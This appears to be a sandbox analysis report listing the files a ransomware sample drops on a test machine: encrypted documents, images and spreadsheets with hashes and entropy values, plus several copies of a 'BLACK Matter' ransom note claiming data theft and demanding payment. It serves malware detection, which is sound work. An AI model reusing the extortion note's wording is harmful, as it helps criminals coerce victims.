              Preview: X..1*.xq.n..u.-....&vK.Ti ...c!O0.B:q.99..FTkB......C....?.-.t...b..<B...@'.X*J..+U............5m{..>&..X.....`.n....VwR...+.*..a...'.;..C.I.^....K?pY.3.4.z.yJ.'...q..(.\.>..x.z..M.m.!...S....|...*s..se.Z*....A}.l.......?..-S...a..@..s..).Y\.....*M..'.K..y].^/......dx6....()......Qm.t..@..o.....-F..G..fQ..D:...(......w....S.......A....g.Ve...".^...?t.......w_.V....i.P>l.y.>9y.......^..v[*f..VRN...B.F.8..8MY.[\.c~8L.t~W.#r..l..Uq..DN......E......K.......Ib....B.8."y...d..c..(p,.u.......,..%.7?.7.$....^.^....D...m.CE.$........P......[.._..y...8..:..d'.%..k..../|.z....U.>C.....&...i;.v?A.T..u..Ma.;.uU.......)@.g$b...t.h..G....;....Lc.....Y.............75....D...WI.GV..D....+-v..j..A..l.*m.....%6..A8.iz?........o.....x......H....r.y...x..e.j...H<..L.5a.5..s.,..L+?..Xl.%...>N.....F.....%mY.x.....v6.........PY>Q.H......Xy...*...>.....yZ..p..h...(...,..#.........8..O.W..`...b..;..r...T....NFl..L..<.G_4AX..q.A.:g..OC.......;.Yd...bVC1.
              C:\Users\user\Desktop\LSBIHQFDVT\QCFWYSKMHA.jpg.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.808615242828143
              Encrypted:false
              SSDEEP:24:Z6aXxp+SlQNru+2Gg9s6IbLQUbHrN2hj2CpCOz7NEkkcwh:2SOu+2Gg9XUIhR7NEk6h
              MD5:99F9E3E7C1E9BD48F902D99D72C13BB4
              SHA1:7BE2469968C92F9874ED0CAC8E84F9358367CFEF
              SHA-256:D6FF01A7CE9B18B29524080AB4AF642297AF8CF2070D784A3A1AAF9994815B6A
              SHA-512:D3AAB80309DC727BBCDB0178374D5AF1FBDD77E80BCD5A2942A4C038944C9021E5107E526FCBAB4181F11D444704EDB7D6E7CF6396249072D1449D9FC56A7D83
              Malicious:false
              Preview: :].I.4........W... p..~!JH.oaT |.T.[hY....@t{.n..6.xj9q..|......c.(XA.......3....u...#....S.......GN.<R....T<d.Yw......h.Ri.|.Q.N].9.l............Ppc.q.h.....l....&.....J.5E =.........o...-3....O.(T.x+g..x8K.V.l..,...5oz..x.(../..K..(1^.D.Y ..e.gM.=.a.z.o......d0..._...."7t...p...e.....N...."....mo.t.~B!9...o..#nZ........5.8i..;N.".h...'.%./..$R..X.2$H..."...G..(q`..yB?..)...~3P..."}.Z...:..........d........n...u.{.?.+.'O."...[ .|.-6X!.\..).U.|.`9Y....V....[MX.Z..."e...;Q.UN.P...v.p6...<.=..2....&......I;....F.f>`.....}.Gu4,..f.*.g..+).K...YF..K..@)......cX...&..8.^......3V..d..'..A..1.....6...N...}y.=...$e..KP3q..{.W...._x..E.kM|Sw..Vu-"c.X|.E.\.g.i.).=0......Y9....)Y...a{6+.(.Uw.Q...U...f.._4.K.......1...3`R..u.D..)....2...|.5.I.l.o.n\.....\..)9....<...[.F...c..{...o`>.!Z..m....j...t.....zf.;.btN..`.YTm.P#]..Y."B...0.n..-2(|......f..=W........>5.J=R^..C.*3.. #....c...@..-..v....3...5.=<..<XV.O.y..8.T....{...uW5...V....>#}...@....F.qh
              C:\Users\user\Desktop\LSBIHQFDVT\SUAVTZKNFL.mp3.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.848552547997476
              Encrypted:false
              SSDEEP:24:+CjrOCfUGaGK3fiWUSIq7SjzD5ivd3vO2G+zgnFHl7h3FhwjPICUJYHFn/xo2W2B:+CjaCfUVGK3fiWpIq74+fZG+zgbhMjAg
              MD5:8A2EB1D252854A3D1A5DEF2D233B454D
              SHA1:981F74D032FA7EE90D95CBADD5112F3AB0D86A99
              SHA-256:9DBA97FCF55726A47B0AF4E5DFF6CDF3FD3E71316E6212B2C95A05C486DE27D2
              SHA-512:15241EF0B6E504F2EC208E91D936B2049F2353BCAC5CECE8963F4E2348A8544F03E08CC2B89D29B3D42B0B7283956BADB84DB0D571F54C3859C122EF86FE01D4
              Malicious:false
              Preview: 3r.....y.N.DzJ7A....d....[.K.......$E....J........:....A.p..G...t...q...6..3d.n...J.m^.Z...a.Kk.L'{s.n.4.cJ..c..I;..}...0#p..z......l9%t.s.v..3$.....F.j....:h...q....;a...L.J.F}..mQ.A.G-..jV8.VB.V.A..../S.....~..%....o..C.qY..M7...-e.j.Hkc+w..r..@.....!....]...n....Q3......5..jt.c.M...+Y.5I.B)......... ....Zt.$2B...2..o....../....D,,...;.*&.'+..Co.....\2U.....X}.D..D$y../.(..la=]...6.}@6....0......6.\].(@..u........<...X....J.....$.'.n.Y....{...........c.V......#....)uX.NW.=.c...>N._(`....O1..f.R..f.,0.V..x.~'.I".z..Rd...-..\%R.+..B..R6....~..4.y\..?.X.......rg)..im.8.Mv...Z.V..!..p...(.@$..%..X...&..l/.Q.?c........i.g[.......V.z......Q.].......C.\..y`....j./..=..U..i.~..n.........N..J...S..X.....vOI-..d.A..$..N...M.;..h...62..RG_O...9..z.c.d..b.....~O}..s.9.O.`....5...D.~t .CeA...<........H..UOV.k.5.:C..#>^N...1..Ib..Sd..x:...}...P.H.+w..'X...(.o._M81.a;.'=.y.k.....7...h0..xI.D..E...0h...e.K.V...f.2.Y...{K/..U.2...!+.L.v.LF.....T.......<:mp...
              C:\Users\user\Desktop\LSBIHQFDVT\ZQIXMVQGAH.xlsx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.839622960474395
              Encrypted:false
              SSDEEP:24:+ZVz6Ug6nnXeDWIe7caANzarj3ievjioM+5o+Gc9p5SH+RQB8EL5UXt1uPYCD0fF:GVWNHKIc1NrriWGozS+pVmb5UXVU0fK8
              MD5:5A9E640E87301E65EF9127BD729838ED
              SHA1:D0B167CBC557F9E7DF655C063652E14F0C3861C7
              SHA-256:B449CACD6598B2FE4DC46E947394E065C089B43F22C3BE8573F30A5DADD65D90
              SHA-512:AE3691EA936516658990717BF11617EA557E7DC8DE2FC0E5E9BDDEF4A82667803CB817A74602C719FD910A42ACF1B864862653AFB55366D5EB9DF6AD42A43850
              Malicious:false
              Preview: .P.Q..t....|z...-...h...C..6...{.+Z^....t...@`"...?Y....8.w<....h...;.f..8.{.A.v.....[.<..z.9.O.$y5.V.......5.wa...*z..eP...ZO.S......?.G.y'...m..o\..[.Bu...!>..X....}..Y..0...a...FT..U...g.V.._y5.V./e.?MS..$..b..M..I|......$.P..........0"1b.?..,h..;MV........ .P..t.X.Xi.Q2.D.tP....E.lj.9.&N`..U. AJEm.s]../..#......M...@...v.hb-W....w.....Y..NY.I.3....F.6z.....P.(.#<^..m....1..'.TI...^.L.5..]........mO&..k..3Z..k.....f...9.s.0..].3..|..@1V..;37y-/.^..?g2.k..k....{.m..x....&...K..`..;...%U..<QnfF=W.n*...\.a...b..!.1pa~.......DI.xX..bt....q............ :..w.W.!u..'....c..Ug...;E..lIS....A..J...,..o...Mo]..0g..u.#0..b..dy...6.R@c.|...<@.Og...$A.QP..M.:~%.62l..N....2Q:e@.L.sE.{..88;.T....z.m...}E....B.L..|a....-.....yo..g."M...T}.@2......F..q@..X...s....G..,.....2...}.]].$.u.G...#+C\..,......!n...~.Itd..y...0.Q... .z.t6..).D2.s..j..N.."?...b...x.VG...T...(k.F.P).^...E.j/....@8^8....5..$N..7.I.8g..d.N#7.l....\.e... HbB.L.*P...Y.m:L.......^.p,.8
              C:\Users\user\Desktop\LSBIHQFDVT\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:true
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Desktop\NWCXBPIUYI\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Desktop\PALRGUCVEH.png.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.8336856288207155
              Encrypted:false
              SSDEEP:24:cNuYJBhBxPN5iZoY2Sr6qsih2708v2iKPHJ9zTMG322HXfvv11eLzbNkD:03JBHtDY5mqs/Rv5QJR7X/1MLtkD
              MD5:11FEA8C3F70559E31960EE1A629DC676
              SHA1:628F9C8461C34EFF9310842DD550D12971EDA7EC
              SHA-256:D05C88C85CCE4C659FA2AC5521D1B8E9E4F931CFB1BC8C541E35F69F11120C55
              SHA-512:AC642AFDAB90CC27707EEC25441F8C692F1EB7DD2C1A08DBD7F22BE202187477FE8F142813CF05370D5A5DAE658F5FAD56517CE8972C59DB09E99F59968EFA65
              Malicious:false
              Preview: A.<...{.Z)2.\.w.....z.[....g....V.E.^U..X.3}..3....2.......O...}...........W2...J..K.W..,.......2....`..Nk9......... .b9P.w.......F.r/.'gp.1B.T.........8...(a........i......n ].....3.7w.6qg.~Id..(.Y.h...........J.....l.N.......f...w.2.6..e..........a..X....6..0...v.w(.?...c&*=..8&.T.B.4_..?H..E.j...u.v..f..\.,O.j.,f.W.,."v#0'..l..k..b.>....m.de{....#.uZ..._Q...i..~RI<.i.._..}hw....C...cv..fW.h=..8.....qW7..l...[........t..le[c...h...m.T)i:Q.C..3,G....A.d.4}..z5.S...>&..3.t....z.P_1..{w...T......xV!v.>j."........w 9.{[.>0JCE....m%...(.J. D.........(q.\.!U.B...J.:7...%.4..H.s.q....n..*b7..c.>...QUIe."....3!..\.!..#.......""C^~{.#o.$@*>J.....VSD.Q..C../Y.Np...L....G..pR.V.....f.(aa!..*...CN..?......z~......Fr|.[jO..1|..u..p..v.(.1...I.'A.E.8........d..0....z... \.....V..X.y....'...w...}...15..~.lS;...y.q ;..ML....#..6..8.+v.[......._......|..7.3.. .."....^:5..%$...,5...R.[o..V.z._.(...d..(..tH......LDo.K....:._,.P`.VaO...@b....BEG.|Q.b.
              C:\Users\user\Desktop\PIVFAGEAAV\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Desktop\PWCCAWLGRE.mp3.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.829231990969893
              Encrypted:false
              SSDEEP:24:0zE1i4P48u59ttz8CDwzt4agiR31lasGZ2W8sm2W2aygegi:0zE1nQz/th8CotbllqZ2FMJgi
              MD5:5911D31F5B07154E0BE25ABBA221D5B1
              SHA1:EEB5C5E57EC7F7CB8F06D0C157EAD1F31E0CC76C
              SHA-256:828C53E4F241991E70913BF2AD644348AAABD0F1962CD5561FACCC6EAC877B05
              SHA-512:3DD6F49760CAC96203276140A1B71E907B7E3494A45B4FF61DA29D0DB4EC73D69D41A7D6F7CC72339017253AED3054C586108B26CDEB2B708279E7D1F6F9CEB8
              Malicious:false
              Preview: T&.n..o.F.....**O..8.3.oj......V...rx..MG;.ed...Tp....(.......#.......i..h..-..{}%.......`*..p........$y...'.i....A.F.u...X.....m.lD..".2..h{R...W.^0l..H.>..3U..cHy...W._....EZ..ELzi...l........]S... ..1.8[...7V.mA.z..5#"...w+......Er..SV.n@..O8.(.~...8\.q....}f\.bU....e......./.|o.TI2....._..m..G.J.B..O...C6U..H.Pue..~V....N0./v..l[..d$..A...M..h.]_rl...,.^'8Vn...l..dN.5...#...O.`..q6...,...].V.7.... k..Y..P...sq.....5.v.$...P.s{...6^.....r.....Y:.#.U.Z....'AGvl{..l.XoS...9.....{H...L.......fk......&......[?;,el[(8.zT. 76,.8@.s=EzCT........)"pa.J..r......z...}p.2Y_.^-m.0..5s.....Y.&.L.3.N`.H...XQI....@.b.N.U.H......Qm.......&..k9....v(.z.G..70D.f.......... .U.4.Q....D.o..V.5Lu.w..oMm...S/+..\(.,.&.;A=b*3)(....j..."..7.".J@.D....q...M.x..#....\V.e..7.....*....B&...d...f.3......C.k( .9.Gr....]}`.v.N3..R_#|$.+m.#.Fk.-/...RN..G..8..f...<...M..cTN.....>0<.si.y./..I.*.J..[4w.jG..Ql...oJ.%]...a.j.3....T3.KTU.%<W.S...A...u%)V.n...a%.j...o.%.us....Z....}zm!..
              C:\Users\user\Desktop\QCFWYSKMHA.docx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.8191043054972305
              Encrypted:false
              SSDEEP:24:un2B0gBES2NFOD2yZDD0N5PaMfDVZ6FYwkKGrvAQEfymED1SBDydGBI2:6e0g6S8F62PtLVUFYwPjQEHO1eyIBI2
              MD5:022AA5994FFC39A2B6F1EABDE6CAFBA1
              SHA1:4752D51AA915B07716B87BD6FABAB5B2421F263B
              SHA-256:51F5818B5F118D52B61D9171D7B8762D32F74CCDE6CEB6BF4D6C872C7A0A956D
              SHA-512:DB8D89921C00D35CD9284533687C152D6B7983C1C72781723333166F506F808972FC0E97205B2ECD445E365859B0C6AB7EC6BF7F8602B843524FAA19FE0D62C2
              Malicious:false
              Preview: .8. .2>Q.hDI.SZX[.......m~.n....../I.......94.Q-.y#s|T..I.B._.l.E.X^.c{K.Y?..m_jX..N^......._x..e`.j......K.T.#.f.\.==%4n.......V..>...b...pu..a...,gP..8...rd..PH.....FL..K..J,\..e..Lr..1K.k....a@.oO%q0......{"..5p5)......~....lm^+q..G_hh.q.D.....i.HZ&C........yT....-..LE[0.PS8....a(&l.R...*...6.i.<......r..Ru.S..z.(_....R..Yw....{|r...Q.S.>T9|.)u...kW>Xx.|;....._..oa.........3...N..G$.....*5G.......|.|;..j.."~p".n........B9.=.B.V.....e....{....A.......\.ln5.6R.[..NS.z!|G|].....{.5.,!.D.Z?C..4.....O..b..N}.I......h....m/..?.x67...9."..Au..P.............CQ[H.{.....txo......[.$...B....@.%g^6."...{...R......../.hI..R*)Ca|....6)...."~...dRs..i........EJ-E....m.gP.... ..tO.3.......Q..As}.l2....Z...@...twE...WB...G..u-...~...M..G....S.)).m.$"C..R..3H...'.b7...o.,|W$./..t....43#..N..d.#*...o!..Kb.....h...TO.....j.!.n.dw.....f...M".....M4. .m....|m.=.d...........lA+...34.GN.......v..$.*..>...),."h./t}...."..2..j..k..?....G.$..........|...E..V...<X
              C:\Users\user\Desktop\QCFWYSKMHA.png.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.804447930199076
              Encrypted:false
              SSDEEP:24:yCPo9V7bTM0TqdaYPsLtyUKA5wmpFUkNEhdAkIwTExIQBF01jK4yGrD:xefTbMzPsLtlZFUxTzk0tN/
              MD5:A7607379B70E86AA97ECF88583B2E1BE
              SHA1:1A0138439F3CAC07502294705C5B11D3E347BE8C
              SHA-256:BB6BA51B5A88C4C8503AC7851EF0F369F8196C0C6AA1625336189F0CEA4CB13B
              SHA-512:3C7DD336C482D859C6E484E592DB4CEB221D249FC531FD225C1B883FC91C6E8030806EE6EEE926BF6BCCA3AA402B82E78290E9FB36017773E4FD719A96A162A2
              Malicious:false
              Preview: .[9*..>.sgEo..#....x..S...I._.U.m...p....................Z..S9w'Kd......R.Q.]3.?<|6V6\._...3..JS.Kd...%....#..j..-.R.k..w.V.E..T.8P4....7d.9%...2..<4.20.....,D.;h-\.C......"...O.C..i...W.#..5.......0.5,....7}m&.%....OQ..re..OD@..:......$6.C{Y8n....5...2.6..,...mKU..CQ..w.....H.8T...P..b.$.].S-..!s.....z._........I.f.i[.ng..3...$.n..3..)Q......<.=<..n)Z.<...3p.P+.......e..DD>..0,.i.......a...W....x8.1j)..N.Y..^/.b.k."y.:9.a.Q6..._..........b./k.Xk.".........U..... ..6.....M.{.V.@%G..h.e.....a.^G..|.Ca.NS5]...........I..,7"h.-"...`../[......r..x..u@.<......e...X..sz..=.*...H.G2y.Hy.N..,u..'. .SF.H=..uV.9..Y./.f....<..f<...:.:.."(..j2.....X..MU}K.>h_.q.}&B{.._..`k.i.S.$.G..<X.={..2U........}...J..3E....E... P..?5\w.(z.k.F.B.U...\3..i7..c...o1~.GS&j5D.<..[....s6..5..km|O..r.."B3..?...h..J...pAYT..x..ZC..2..^X..>l3...X..7..B....XC..k.....S-.y.a.`....=P?i.F.R...'.%..[.7d.&=.T+.......y....V..WX..?.,...9S..-...h.:.}......,...#.....7.F
              C:\Users\user\Desktop\QCFWYSKMHA.xlsx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.8428016198884425
              Encrypted:false
              SSDEEP:24:40Q1IJUNUTRejg+jR+eVzcLOQ+2iYbDLx/5qDs7iFPfSJ2ke5YWWQa:lQ10ROR+eVwLOQ+rYTxMD5kJReYZQa
              MD5:E4259A69DE99941F16FBBC6C4DE14327
              SHA1:551AAF65D0A66C203988871CC0CA9C044791A7D3
              SHA-256:8E50DDF2E9202B930DCAF7209AB8F6ECC66E02640531085B5BC80BD34A8A8834
              SHA-512:C61B264C645FB551D3B2148F9EA819E83D0E4058C422644C39EFE7788712A19E97B5DBD387677D8C47EB8188F59130F3C4FE91FAB032468968EA84FAD5CB8130
              Malicious:false
              Preview: .`.).....7.h-.....8$.NFjJ..h.P\....;....?.%8.i.N.I6.{....5.....=.....Or.....1.|)...d86.I..Ibq.f.Y:..I>.$.....5&.8.7p...~'Ha.I.vU...gV....~.g.!U,.%.....A..Nx.0C....t....^.}e{..o.FfUM......x.'C....&L...K#< M#...W.lp/....*..G./I.{HJy"q..A&.u.h...C..<.Cq...o._d..@O..$..H..-...toF.u..HQSZ..9C.J.;.w9."qDy..\.a*...Hk....y...A.<..9..g..dOD.1..u...KY/.K....W,...f..M*...v6.....,b2lU...!.q."k..PJT...m..m..g[....gl`.2..(..J:.L..m............k.._=.w.....Q............(f.<.....{.N..FZ...;.....r............>...........e .....7..)a.?y81O....e..)'.k..o..Q%..*R....'w..8.....N.......P...j....;V...U..jp.T...]dN..:...]9~p.rV...t...91....D6#IU.u..X..W.x.e.........C.t.[D.(e.R....j(.p...l.N.Wip..S.....K.qT!2..@....1D...BJ.T#S.l.-A......-.....2......#.}....N.w...}t'.9.L...FR]..6^g...9B\..u...l..f....!q..["JU.^...e....f.K8.DM._.K{N.,f..P.e.....$hn. "..mO%.s...i)....D.}.._.-.3%.8.g&.8......3Y....z.w.].am...\*.....'....-.m.4....W.@Y.]<...A=...x-.?r:...(...X.P.....^.a<
              C:\Users\user\Desktop\QCFWYSKMHA\BNAGMGSPLO.xlsx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.834355660757486
              Encrypted:false
              SSDEEP:24:HoPhqAtOQTArAPklvMHBeK+y21mJR3o/htqI2GfYrNPJmY6AYdDHfHWg4r+FHYDH:HoPh5OQMrAeGom/CqIhYr5YpjKcHm1
              MD5:0461648D77954746C274E631D59B8062
              SHA1:2950711C8D33F7CBA4B674484D40711257FFB3F4
              SHA-256:94800AE933CDC0ACDDA6133F0D341DDF7F511BAAA5F1BA513DBE946112429BDA
              SHA-512:8581DD7438B840D0B8EB6A9AE01FBAB5C6589C2AAC2689A6D9EECE2B7B80DB504253513F1064F910F3AD6146C2CEEE688E8AA7C1765033C62EEF805855ABE10F
              Malicious:false
              Preview: ..t.M.TEH~..LKM.......!.<:...i|.Q.l5F#..%..8 e'.cA.b.......e....._.\+1`.?.X....H..Q2%..| ._n.'.:..|Mey~k.{1.O........o..).=].v.].....V....c...g........<....3V*..~.._.z......~.....]...t..T.7.....v.=....T.o6..R..m.U....vA.z.I.Q.....X?GQz1rO.E..s..A.4R...9..".L88...G..I..S......E.W..W*R..4W..D/b....A3.Z..JX.a.J...'.]9...c$.m.t.E2mD..5/....yb"... .@P..\..{........ .^...K.M8H..Z"_......p.zz....]..g.E.kd,E.m.9.......rG../C..M..n...../.o..I.6tC."..YzI.K.....+.kF...............A@......~.......Yd,K...T...._\.jz_.k.n.N....]\.......(..6......0..{.Nt9.Wa.B}.}..1..2.!..9..y....7...8..%.}S"...r....A..L9.8.....:Qx......J..6..s}.(.dQh...k.g...:{.n......V..._....qh=*...e....._#..=....f..?l..?......F..<55.LC....d.e%.f1W..3......x.../p.q3.J.C.3-,..;Q..J4.....-9I..C .......&..H.....)^....@o..#N......iu..].pO....^R.K..h5...l..m.lO....Wej-.4.;.9:....q.u6f.....Z.........j...gk..g..H..m...T...j..F...i.O.(.Oa/+W.q...W....(..u.D.JW\.Z.".........c.9r.\.
              C:\Users\user\Desktop\QCFWYSKMHA\DUUDTUBZFW.jpg.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.84490292116077
              Encrypted:false
              SSDEEP:24:grnN8EbS+VDPc4ChN15+Iiqyc/LOmNfAidyHDMadBPA1c3ZrU:ONF+Sc4Chcxm1AicHDMadB+J
              MD5:8E4555884FC63A1FD1A58050775CF349
              SHA1:A1D92800037A5B64507351BC0F039EB5858E59C6
              SHA-256:A850CD59AC8DEBFBD97009F446D00FE083A0CBCBD267F4F22C3D30E282A628D1
              SHA-512:707546C3C87ED31D8F0ACA6AE7F933C6BF74D681BABF1BFA65C99FDE4446CE90599C137AC213C072AA82A5BDFBDCA30965CEF64AFF0DE01A0E2AD5ABBE11BB82
              Malicious:false
              Preview: .rS..4.zQ.....q...G[..qO...w.Wt..o..8....-..II>,...."}.&t.P.C`.M]..+.......Y....\.A...c.4`9[...&..:.kM.i*d.w]%.C..A1G.U....*....?.{l.7.u.].5..).[...&.....B....G.....R......w..R.^~M........Ang....J(.[ww....m>....l.<....=3">..<Kg.L....@...........c..*....x...."gO.#...Q..y/.Y8.....c............8..A.]..+c.m..Z=.J.e.....Oh\.&qY..i.....k../,VL...........+Q..:k...!O..s|..B...B...aY...^Ey.[..g....O.W?R.i....&.,Tq@.....E.T.....dsp.&.S.i.v...Y..+..q._...._...+f......{M7...C......'.d..t.xl.s[$R.Q.I...f9.l....>\._.iErKe......|O.R)..o.L...as.z.E<...r.x...Hb.y:F..F%...K.....n....y..k..w....-..N@{...........Y/..U.6.\e._.....%.\.F...F..&..........0a..i..=...C5....m).....r...}..X...U\w....|9...b)=....U.._V.:.n....>g.....8...at<..xtOw.z.....T..4.p...Z&Sva.l_...U.1X.r%...s/k....._<.7...$W..O.K..<8C.4..n_z.....Z...c..?.2.p....Q.U..>^..;}0b+)0M..~..v..Gti+...)3....b...R..%....f..X;.U.,...h....wA....!.r..-.N...t}.i.=.o.....,...Y.Td.@......*.bp.
              C:\Users\user\Desktop\QCFWYSKMHA\EFOYFBOLXA.pdf.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.822304803110229
              Encrypted:false
              SSDEEP:24:BO2o9n+40L7sOZjaBvJW6tF6acY13V8PCJG/VC3PYSElkWoBL2nwb3wF/c8XbPl:Bwn4pZGWKkMiPC8EfYSe6uwb3oBZ
              MD5:EE4A78511DF8E67FED94F48EC99A812D
              SHA1:C489A882FA8662224E444A5B7B0034639C7D3F78
              SHA-256:B56AF0A95240D2ECC74931870A927602D4BF7C7873CB8F53F1AEF544257282DE
              SHA-512:24E01027A745BA7E02A9524A878F0E4A354B1590E5A0B3510B9179B5D41C267A1E81FBE6F58E3D14580CE15849038C3DD39C921BEF7A1930B68BE05D48CE4C41
              Malicious:false
              Preview: .L..~....5u\]...<wm7..We...Z....V..cv.4[L{?..[E.9...C... KV.n..&>..... &.{|Y6R...<x.)}.H^]..H..P....|..wDo...J..C...l....e....i..p.U......<Y6.....$.".DctJ....[!....A....Fuq.=. @.,..7C$`....._..".....y.3..s..q..j...O.Y.\..=.L..?.a.....]..@K......#n..;..Hrj.l.S..G........GM.........4......:Hu'..G..2@s..(nT.xf...u....]..&\.S....3k.p.-`.....'@MVl........K[...].^.Py.&..iuBP5P.;:0..X.M._.s!.....}.*.v..A......Zq.r...c...?.).J.NF..l........)...N.......%K.......;DD.Z......n.X.?....Xpa.t...S..78...sgJ.'..Q...Z.......&.DTt...Z..9+g...F].-M...U........`........ .-.J...D.....@.(k.)...6.cIX.].B..4.57..H.q..v.NR.;.n^...z...G.?...h.e-4.....)...-/..!r'N...h.s.(.....A.4&.7,.8.'.S1.M..c-......@a.&.;..q..C.^.6.`.U.........+:..[=......2..l...`J...E_..D..c........8.. ^b.:...Aw...@=......oB....0......?>.......0'L.s.x%..i.>..\3.AG`R..l.BS.q4dM...W0 V.5.ac.....S..hn..j..Xp.b.....2..M..n..ke...*.:..k. 0......*.Q.+.....*F<DK...d.0x.....)...a"q..aB..l..
              C:\Users\user\Desktop\QCFWYSKMHA\EWZCVGNOWT.png.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.828245516025254
              Encrypted:false
              SSDEEP:24:QMtjmrBV/VOFI4TPu56kDxq8dCF2IC/MSXrta2VMObNsuEmcmp:LtODOFbT7kI8dnXxvVbRp
              MD5:D9E5D85FF2116C8E3ABBF8C08831DC85
              SHA1:64994F8256EFB390A99371ACB88D4000D8D330E5
              SHA-256:FD9726CB3FF0AEA056AD607AAA50178A53A622FD3B05795A25EA44022074A886
              SHA-512:48FD2427F70809EE6E511D6A637B7B89339FC90F6D704DB429DD06C1E7F448C9526E0DBA215293148B4A7D376D738A0A6511A3F305A71EF8236A20C0DCB9BD53
              Malicious:false
